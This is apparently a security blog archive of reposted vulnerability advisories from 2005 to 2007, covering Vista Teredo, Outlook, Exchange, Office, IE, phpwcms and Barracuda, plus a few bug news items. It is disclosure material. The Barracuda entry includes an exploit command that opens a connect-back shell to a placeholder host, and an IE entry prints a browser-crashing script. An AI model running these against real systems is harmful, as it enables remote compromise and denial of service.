Vista Windows Firewall Incorrectly Applies Fltering to Teredo InterfaceAuthor: Jim Hoagland / Ollie Whitehouse
Release Date: 10-07-2007
Application: Windows Firewall (Vista version)
Platform: Windows Vista (RTM and RC2 builds known affected; XP, 2003 would not be affected)
Severity: Unintended remote exposure to services
Vendor status: Resolved in MS07-038
CVE Number: CVE-2007-3038
Reference: http://www.securityfocus.com/bid/24779
Overview: Windows Firewall for Windows Vista is the Microsoft provided
firewall solution. It is installed and enabled out-of-the-box,
with most ports filtered.
Due to an implementation issue, the Windows Firewall does not
apply firewall rules correctly on the Teredo Interface. This
allows a level of remote access to TCP and UDP ports and services
that exceeds what Microsoft expected and what an administrator
would expect.
Details: Teredo is an IPv4 to IPv6 transition mechanism for IPv6-capable
hosts that are located behind an IPv4 NAT. It is installed and
enabled out-of-the-box on Windows Vista. It provides end-to-end
automatic tunneling through a NAT by tunneling IPv6 over IPv4 UDP
packets. Once a Teredo interface becomes set up (in Teredo
terminology: qualified), anyone on the Internet that knows the
Teredo address can send it packets and possibly establish
sessions. This capability persists until the Teredo interface
becomes de-qualified for some reason; while in general Teredo
works to keep an Teredo interface qualified, under some
circumstances, Vista will shut down the interface after 60 minutes
of inactivity.
By design, Windows Firewall is supposed to block all access to
ports on the Teredo interface, except for cases where
access-though-Teredo is specifically requested (through the "Edge
Traversal" flag in the firewall rule being set). However, due to a
logic bug, it does not apply this restriction. Instead, any port
that is accessible on the local network is also accessible from
any host on the Internet over the Teredo interface, even if the
firewall rule specifies "remote address=local subnet".
The level of exposure depends on current firewall rule settings.
An out-of-the-box Vista installation with a network profile set
to "private" will expose the following port across the Teredo
interface:
* TCP port 5357 (Web Services for Devices)
An exposed service may reveal sensitive or useful information to
an attacker. In combination with a vulnerability in the service
it may also provide an avenue of attack. In addition, a service
that was designed to only be accessible in trusted circumstances
may simply not present an adequate security posture for general
Internet access.
It is not considered difficult for a remote user to cause the
Teredo interface to become qualified. Teredo can become qualified
simply because Vista or some application wants to use IPv6 for
whatever reason. The attacker would then just have to guess the
Teredo address or learn it by some means and they would be able to
access any open ports.
Teredo will also become qualified if the address of a peer
represents a Teredo address (perhaps even if the peer has a native
IPv6 Internet access). Thus an attacker can send a URL of this
form "http://[2001:0:...]/..." through e-mail, IM, HTTP, etc, and
if the URL is followed, the attacker will both know the Teredo
address of the victim and will have had the victim become
qualified. A HTTP redirect to such a URL would also work and may be
more stealthy. Reportedly, Vista will not return AAAA records
corresponding to Teredo addresses, so attackers Teredo address
would have to be listed by address and not by hostname.
Vendor Response: This has been patched in MS07-038.
Recommendation: Apply the patch contained in MS07-038.
In addition you should consider whether Teredo poses an acceptable
level of exposure to your network. If it provides too much
exposure (e.g., due to bypassing network-based security controls),
you should disable Teredo and block it on your network
Labels: Bug, Firewall, Microsoft
Theo de Raadt posts some concerns about Core 2 processors. Interesting quotes include:
"Various developers are busy implimenting (sic) workarounds for serious bugs
in Intel's Core 2 cpu.
These processors are buggy as hell, and some of these bugs don't just
cause development/debugging problems, but will *ASSUREDLY* be
exploitable from userland code."
and:
"Note that some errata like AI65, AI79, AI43, AI39, AI90, AI99 scare
the hell out of us. Some of these are things that cannot be fixed in
running code, and some are things that every operating system will do
until about mid-2008.."
and:
"At this time, I cannot recommend purchase of any machines based on the
Intel Core 2 until these issues are dealt with (which I suspect will
take more than a year). Intel must be come more transparent.
(While here, I would like to say that AMD is becoming less helpful day
by day towards open source operating systems too, perhaps because
their serious errata lists are growing rapidly too)."
A good, easy to understand summary for normal people is here: http://www.geek.com/images/geeknews/2006Jan/core_duo_errata__2006_01_21__full.gif
Only one bug is listed due to be fixed by Intel. All others are to be fixed by BIOS or OS producers.
Labels: Bug, Hardware, Vulnerability
Security Advisory : CT09-01-2007
Microsoft Outlook Advanced Find - Remote Code Execution
Severity: Critical
Impact: Remote System Access
Solution Status: Vendor Patch
CVE Reference: CVE-2007-0034
Advisory Date: 11th January 2007
Affected Software: Microsoft Outlook 2000
Microsoft Outlook 2002
Microsoft Outlook 2003
1. OVERVIEW
Microsoft Outlook is a popular personal communication manager that
provides end users with a unified place to manage e-mail, calendar
and contact information.
As part of its standard offering, Outlook also includes an Advanced
Search facility (Finder.exe) enabling end-users to query any aspect
of their repository information.
Unfortunately, it transpires that Outlook/Finder is susceptible to
a remote Buffer overflow vulnerability, when processing the contents
of a specially crafted Office Saved Search (.oss) file.
2. TECHNICAL NARRATIVE
The issue in question stems from a simple oversight in the design of
an intrinsic string manipulation function, which attempts to copy
1024 bytes of user supplied Unicode content, to a pre-allocated buffer
of only 512 bytes (even though sufficient length checks are invoked).
As the destination buffer is unable to accommodate the additional data,
the net result is that of a classic stack overflow condition, in which
Instruction Pointer (EIP) control is gained via one of several available
return addresses.
3. EXPLOITATION
As with most file parsing vulnerabilities, the aforementioned issue
will require a certain degree of social engineering to achieve successful
exploitation.
However, Office Saved Searches (.oss) file types share very similar
display characteristics to that of harmless looking e-mail icons.
As such, end-users could be fooled into thinking the attachment is
a non-threatening mail forward.
4. VENDOR RESPONSE
The vendor security bulletin and corresponding patches are available at the
following location:
http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx
5. DISCLOSURE ANALYSIS
12/05/2006 - Preliminary Vendor notification.
24/05/2006 - Vulnerability confirmed by Vendor
16/10/2006 - Public Disclosure Deferred by Vendor
09/01/2007 - Public release.
Total Time to Fix: 7 months 29 Days (243 days in total)
6. CREDIT
The vulnerability was discovered by Stuart Pearson
Computer Terrorism (UK) :: Incident Response Centre.
Labels: Bug, Email, Microsoft, Vulnerability
Previous story:
http://www.xnet.com.pk/news/2007/02/f-22-computer-glitch.htmlJets can now cross Pacific, Far East safe for democracy againBy Lewis Page
Published Wednesday 28th February 2007 10:59 GMT
Significant new capabilities have been added to the US Air Force's latest superfighter, the F-22 "Raptor". The USAF's Raptors cost more than $300m each, and are generally thought to be the most advanced combat jets in service worldwide. However, until recently they were unable to cross the international date line owing to a software bug in their navigation systems.
A group of F-22s heading across the Pacific for exercises in Japan earlier this month suffered simultaneous total nav-console crashes as their longitude shifted from 180 degrees West to 180 East.
Luckily, the superjets were accompanied by tanker planes, whose navigation kit was somewhat less bleeding-edge and remained functional. The tanker drivers were able to guide the lost top-guns back to Hawaii and the exercises were postponed.
"Every time we fly this jet we learn something new," Raptor squadron commanding officer Lt-Col Wade Tolliver said.
But enemies of democracy who may have been planning an opportunistic attack on Hawaii followed by a retreat to safety across the date line shouldn't get their hopes up. The software bug has been rectified, and the Raptors have now successfully travelled to Kadena Air Base in Japan, where air-combat exercises are now well underway.
"This is history in the making," said Brigadier Punch Moulton, commanding the Kadena-based 18th Wing.
The deployment is expected to last more than three months.
Labels: Bug, Military
phpwcms-referer-security-bypass (26130)
Description:phpwcms is a Content Management System (CMS) written in PHP. phpwcms versions 1.2.5-DEV and prior and versions 1.1-RC4 and prior are vulnerable to header injection, caused by improper validation of the HTTP REFERER header by the act_formmailer.php and mail_file_form.php scripts. A remote attacker could exploit this vulnerability to use an affected system to send arbitrary email and spam messages.
Platforms Affected:Data General: DG/UX Any version
Hewlett-Packard Company: HP-UX Any version
Hewlett-Packard Company: Tru64 UNIX Any version
IBM: AIX Any version
Linux: Linux Any version
Microsoft Corporation: Windows 95
Microsoft Corporation: Windows 98
Microsoft Corporation: Windows 98 Second Edition
Microsoft Corporation: Windows Me
Microsoft Corporation: Windows XP
Microsoft Corporation: Windows 2000 Any version
Microsoft Corporation: Windows 2003 Any version
Microsoft Corporation: Windows NT 4.0
phpwcms: phpwcms 1.1-RC4 and prior
phpwcms: phpwcms 1.2.5-DEV and prior
Santa Cruz Operation, Inc.: SCO Unix Any version
SGI: IRIX Any version
Sun Microsystems, Inc.: Solaris Any version
Wind River Systems, Inc.: BSD Any version
Remedy:Apply the patch for this vulnerability, available from the phpwcms Web site. See References.
Consequences:Bypass Security
References:FrSIRT/ADV-2006-1556, phpwcms Remote Code Execution and Mail Form Security Bypass Vulnerabilities at http://www.frsirt.com/english/advisories/2006/1556.
phpwcms Forum, Fri Apr 21, 2006 16:11, Security Alert 1.2.6 CVS at http://www.phpwcms.de/forum/viewtopic.php?t=10958.
phpwcms Web site, phpwcms at http://www.phpwcms.de.
Standards associated with this entry:CVE-2006-7020: CRLF injection vulnerability in (1) include/inc_act/act_formmailer.php and possibly (2) sample_ext_php/mail_file_form.php in phpwcms 1.2.5-DEV and earlier, and 1.1 before RC4, allows remote attackers to modify HTTP headers and send spam e-mail via a spoofed HTTP Referer (HTTP_REFERER).
Reported:Apr 21, 2006
The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Copyright (c) 1994-2007 Internet Security Systems, Inc. All rights reserved worldwide.
Labels: Advisory, Bug, Vulnerability
CNN television this morning reported that every fighter completely lost all navigation and communications when they crossed the international date line. They reportedly had to turn around and follow their tankers by visual contact back to Hawaii. According to the CNN story, if they had not been with their tankers, or the weather had been bad, this would have been serious. CNN has not put up anything on their website yet.
Labels: Bug, Military, Vulnerability
Microsoft Windows and Exchange Server VulnerabilitiesOriginal release date: May 9, 2006
Last revised: --
Source: US-CERT
Systems Affected
Microsoft Windows
Microsoft Exchange Server
For more complete information, refer to the Microsoft Security Bulletin Summary for May 2006.
Overview
Microsoft has released updates that address critical vulnerabilities in Microsoft Windows and Exchange Server. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on a vulnerable system.
I. Description
Microsoft Security Bulletin Summary for May 2006 addresses vulnerabilities in Microsoft Windows and Exchange Server. Further information is available in the following US-CERT Vulnerability Notes:
VU#303452 - Microsoft Exchange fails to properly handle vCal and iCal properties
Microsoft Exchange Server does not properly handle the vCal and iCal properties of email messages. Exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on an Exchange Server.
(CVE-2006-0027)
VU#945060 - Adobe Flash products contain multiple vulnerabilities
Several vulnerabilities in Adobe Macromedia Flash products may allow a remote attacker to execute code on a vulnerable system.
(CVE-2006-0024)
VU#146284 - Macromedia Flash Player fails to properly validate the frame type identifier read from a "SWF" file
A buffer overflow vulnerability in some versions of the Macromedia Flash Player may allow a remote attacker to execute code on a vulnerable system.
(CVE-2005-2628)
II. Impact
A remote, unauthenticated attacker could execute arbitrary code on a vulnerable system. An attacker may also be able to cause a denial of service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the
Security Bulletins. Microsoft Windows updates are available on the Microsoft Update site.
WorkaroundsPlease see the US-CERT Vulnerability Notes for workarounds.
Appendix A. References
Microsoft Security Bulletin Summary for May 2006 -
Technical Cyber Security Alert TA06-075A -
US-CERT Vulnerability Note VU#303452 -
US-CERT Vulnerability Note VU#945060 -
US-CERT Vulnerability Note VU#146284 -
CVE-2006-0027 -
CVE-2006-0024 -
CVE-2005-2628 -
Microsoft Update - Labels: Bug, Microsoft, Vulnerability
Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
Labels: Appliance, Bug, Spam, Vulnerability
Microsoft IE mshtml.dll Multiple Script Action Handler Overflow
OSVDB ID: 23964
Disclosure Date: Mar 16, 2006
Description:
Remote overflow exists in Microsoft Internet Explorer. The product fails to properly check bounds for handling HTML tags with multiple event handlers resulting in a buffer overflow. With a specially crafted HTML document, an attacker can cause affected web browsers to crash or remote code execution resulting in a loss of integrity, and/or availability.
Vulnerability Classification:
Remote/Network Access Required
Denial Of Service Attack
Input Manipulation
Loss Of Integrity
Loss Of Availability
Exploit Available
Verified
Products:
Microsoft Corporation Internet Explorer 6.0 SP2
Microsoft Corporation Internet Explorer 7.0 beta 2
Microsoft Corporation Internet Explorer 7.0 beta 1
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Manual Testing Notes:
The following HTML content demonstrates this issue by crashing the browser:
<script>
for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;
</script>
External References:
Snort Signature ID: http://www.snort.org/pub-bin/sigs.cgi?sid=100000238
CVE ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-1245
National Vulnerability Database: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-1245
Bugtraq ID: http://www.securityfocus.com/bid/17131
Microsoft Security Bulletin: http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx
Generic Exploit URL: http://lcamtuf.coredump.cx/iedie.html
ISS X-Force ID: http://xforce.iss.net/xforce/xfdb/25292
Secunia Advisory ID: http://secunia.com/advisories/18957
Secunia Advisory ID: http://secunia.com/advisories/19269
Microsoft Knowledge Base Article: http://support.microsoft.com/default.aspx?scid=kb;EN-US;912812
Other Solution URL: http://snort.org/rules/advisories/ie-issue-js-v2.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0303.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0304.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0310.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0325.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0048.html
Security Tracker: http://securitytracker.com/id?1015794
Credit:
Michal Zalewski (lcamtuf@dione.ids.pl) - Personal page (http://lcamtuf.coredump.cx/)
Labels: Advisory, Bug, http, Microsoft
Microsoft Office and Excel Buffer Overflows Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1015766
SecurityTracker URL:
http://securitytracker.com/id?1015766 CVE Reference: CVE-2005-4131 , CVE-2006-0009 , CVE-2006-0028 , CVE-2006-0029 , CVE-2006-0030 , CVE-2006-0031
Updated: Mar 14 2006
Original Entry Date: Mar 14 2006
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Description: Several vulnerabilities were reported in various components of Microsoft Office. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a specially crafted document that, when loaded by the target user, will trigger a buffer overflow and execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
An Excel document with a specially crafted range can cause arbitrary code to be executed on the target system [CVE-2005-4131]. [Editor's note: This vulnerability was previously disclosed in Alert ID 1015333.]
A specially crafted routing slip within an Office document can cause arbitrary code to be executed on the target system [CVE-2006-0009].
An Excel document with a specially crafted parsing format file can cause arbitrary code to be executed on the target system [CVE-2006-0028].
An Excel document with a specially crafted description can cause arbitrary code to be executed on the target system [CVE-2006-0029].
An Excel document with a specially crafted graphic can cause arbitrary code to be executed on the target system [CVE-2006-0030].
An Excel document with a specially crafted record can cause arbitrary code to be executed on the target system [CVE-2006-0031].
Microsoft Office 2000 SP3, Microsoft Office XP SP3, Microsoft Office 2003 SP1 or SP2, Microsoft Works Suite 2000, 2001, 2002, 2003, 2004, 2005, and 2006, Microsoft Office X for Mac, and Microsoft Office 2004 for Mac are affected.
Microsoft Office Excel 2000 Viewer, Microsoft Office Excel 2002 Viewer, Microsoft Word 2003, Microsoft Outlook 2003, and Microsoft PowerPoint 2003 are not affected.
Microsoft credits Ollie Whitehouse of Symantec [CVE-2006-0009], FelicioX [CVE-2005-4131], Peter Winter-Smith of NGS Software [CVE-2005-4131], TippingPoint and the Zero Day Initiative [CVE-2006-0028], Dejun of the Fortinet Security Response Team [CVE-2006-0029], and Eyas of the XFOCUS Security Team [CVE-2006-0031] with reporting these vulnerabilities.
Impact: A remote user can create a file that, when loaded by the target user, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
Solution: The vendor has issued the following fixes:
Microsoft Word 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4
Microsoft Excel 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9433440-31EF-4C18-A0C7-B595EA23F6FC
Microsoft Outlook 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=2B231231-AC83-4688-9C8D-DCDCB544FB3C
Microsoft PowerPoint 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F24D4BD0-4771-4688-B52A-02D4EABB1574
Microsoft Office 2000 MultiLanguage Packs:
http://www.microsoft.com/downloads/details.aspx?FamilyId=0AAA1700-766F-4979-B51F-AAA0A24EF2E8
Microsoft Word 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Excel 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=643337C7-8A47-4FA3-AB58-7A916B33607D&displaylang=en
Microsoft Outlook 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=9B0D4441-4F88-4B59-A4F3-6FB558EF8135
Microsoft PowerPoint 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C74CB45B-CF92-4EFC-8DBE-DBF4BDEBE215
Microsoft Office XP Multilingual User Interface Packs:
http://www.microsoft.com/downloads/details.aspx?FamilyId=589D9ABB-6308-4208-881C-CE58D6972E1F&displaylang=en
Microsoft Excel 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=AC22F83A-B409-4469-984E-6C19D8F5FE41&displaylang=en
Microsoft Excel 2003 Viewer:
http://www.microsoft.com/downloads/details.aspx?FamilyId=7DBADBD1-0542-475B-91B5-90DD2AF2C0FC&displaylang=en
Microsoft Works Suite 2000:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4&displaylang=en
Microsoft Works Suite 2001:
http://www.microsoft.com/downloads/details.aspx?FamilyId=CD2179FD-37F5-4D09-B653-0174651CF5E4&displaylang=en
Microsoft Works Suite 2002:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Works Suite 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Works Suite 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Works Suite 2005:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Works Suite 2006:
http://www.microsoft.com/downloads/details.aspx?FamilyId=8B98A5FE-7A26-45F0-8D28-C9618FA7A458&displaylang=en
Microsoft Office X for Mac:
http://www.microsoft.com/mac/
Microsoft Office 2004 for Mac:
http://www.microsoft.com/mac/
The fixes in this bulletin replace some fixes in MS04-033, MS05-012, MS05-035, MS06-003, and MS06-010.
A restart may be required.
The vendor's advisory is available at:
http://www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS06-012.mspx
Cause: Boundary error
Underlying OS: UNIX (OS X), Windows (2000), Windows (2003), Windows (XP)
Labels: Advisory, Bug, Microsoft, Vulnerability
OSVDB ID: 23939
Disclosure Date: Mar 17, 2006
Description:
BorderWare MXtreme contains a flaw related to the web administration interface. No further details have been provided.
Vulnerability Classification:
Remote/Network Access Required
Unknown Attack Type
Loss Unknown
Exploit Unavailable
Verified
Web Related
Products:
BorderWare Technologies Inc. MXtreme Mail Firewall 5.0
BorderWare Technologies Inc. MXtreme Mail Firewall 6.0
Solution:
Apply the patch provided by BorderWare, as it has been reported to fix this vulnerability. In addition, the vendor recommends disabling HTTP/HTTPS login access until patches can be applied.
External References:
CVE ID: 2006-1254
National Vulnerability Database: CVE-2006-1254
Bugtraq ID: 17140
Secunia Advisory ID: 19223
Security Tracker: 1015787
FrSIRT Advisory: ADV-2006-0972
Credit:
OSVDB does not have information on who discovered this vulnerability. If you have credit information please send it to OSVDB Moderators
Labels: Advisory, Appliance, Bug, Vulnerability
From: NGSSoftware Insight Security Research (mark at ngssoftware . com)
Date: Tue Jan 10 2006 - 16:49:03 CST
John Heasman and Mark Litchfield of NGSSoftware have discovered a critical vulnerability affecting Microsoft Exchange. The vulnerable versions include:
Microsoft Exchange Server 5.0 Service Pack 2
Microsoft Exchange Server 5.5 Service Pack 4
Microsoft Exchange 2000 Server Pack 3 with the Post-Service Pack 3 Update Rollup of August 2004
Microsoft Exchange Server 2003 Service Pack 1 and Microsoft Exchange Server 2003 Service Pack 2 are *not* affected.
The vulnerability potentially allows execution of arbitrary code when the Microsoft Exchange Server Information Store processes a specially crafted email message.
The flaw has now been addressed and patches are available from:
http://www.microsoft.com/technet/security/Bulletin/MS06-003.mspx
NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 10th April 2006. This three month window will allow system administrators the time needed to obtain the patch before the details are released to the general public. This reflects NGSSoftware's approach to responsible disclosure.
http://www.ngssoftware.com/disclosure.pdf
NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070
Mark Litchfield
www.ngssoftware.com
Tel: +44 208 40 100 70
Fax: +44 208 40 100 76
Cell: +1 253 414 4749
Labels: Bug, Email, Microsoft, Vulnerability
SecurityTracker Alert ID: 1015038
SecurityTracker URL: http://securitytracker.com/id?1015038
CVE Reference: CAN-2005-1987
Date: Oct 11 2005
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Advisory
Version(s): Microsoft Exchange 2000 Server SP3
Description: A vulnerability was reported in Microsoft Exchange in the Collaboration Data Objects component. A remote user can execute arbitrary code on the target system.
The Collaboration Data Objects (CDO) COM component contains a buffer overflow. A remote user can supply a specially crafted message to be processed by CDOSYS or CDOEX to trigger a buffer overflow and execute arbitrary code on the target system. SMTP can be used as an attack vector.
Microsoft Windows is also affected.
The vendor credits Gary O leary-Steele of Sec-1 with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system.
Solution: The vendor has issued the following fixes:
Microsoft Windows 2000 Service Pack 4:
http://www.microsoft.com/downloads/details.aspx?FamilyId=AE0BA6D7-37AF-46E8-9E25-AB 63883FA944
Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:
http://www.microsoft.com/downloads/details.aspx?FamilyId=E0DAF2D1-656C-4580- 94C1-8AB009B4AD4F
Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=D389EF4D-583D-41C0-9081-844D348F3817
Mi crosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=1BC06799-B9F5-416F-8965-DC0E07A2 4A29
Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems:
http://www.microsoft.com/download s/details.aspx?FamilyId=956FFD90-60AF-4296-8765-F0A17A77DB77
Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details.aspx?FamilyId=550 4C410-CDCB-4826-B002-DBA0E3A402A4
Microsoft Exchange 2000 Server Service Pack 3 with the Exchange 2000 Post-Service Pack 3 Update Rollup of August 2004:
http://www.microsoft.com/downloads/details.aspx?FamilyId=60FD0DDC-04B7-4879-930B-53375823CD51
A restart is not required.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-048.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)
Labels: Bug, Email, Vulnerability
SecurityTracker Alert ID: 1013687
SecurityTracker URL: http://securitytracker.com/id?1013687
CVE Reference: CAN-2005-0560
Date: Apr 12 2005
Impact: Execution of arbitrary code via network, Root access via network
Fix Available: Yes Vendor Confirmed: Yes
Advisory: Microsoft Security Bulletin
Version(s): 2000 SP3, 2003, 2003 SP1
Description: A buffer overflow vulnerability was reported in Microsoft Exchange. A remote user can execute arbitrary code on the target system.
A remote user can connect to the Exchange SMTP service and supply a specially crafted extended SMTP verb to trigger a heap overflow. Arbitrary code will be executed with System privileges.
On Exchange 2003, authentication is required by default before the specific extended SMTP verb can be supplied. On Exchange 2000, no authentication is required.
The vendor credits Mark Dowd and Ben Layer of ISS X-Force with reporting this vulnerability.
Impact: A remote user can execute arbitrary code on the target system with System level privileges.
Solution: The vendor has issued the following fixes:
Microsoft Exchange 2000 Server Service Pack 3:
http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479 -8AC9-B5544EA0BD66
Microsoft Exchange Server 2003:
http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267
Microsoft Exchange Server 2003 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC
A restart is not required if all applications are closed prior to installation. The security update will restart the IIS, SMTP, and the Exchange Server Information Store Service. The File Transfer Protocol (FTP) and Network News Transfer Protocol (NNTP) services will also be affected.
Vendor URL: www.microsoft.com/technet/security/Bulletin/MS05-021.mspx
Cause: Boundary error
Underlying OS: Windows (2000), Windows (2003), Windows (XP)
Labels: Advisory, Bug, Email, Microsoft, Vulnerability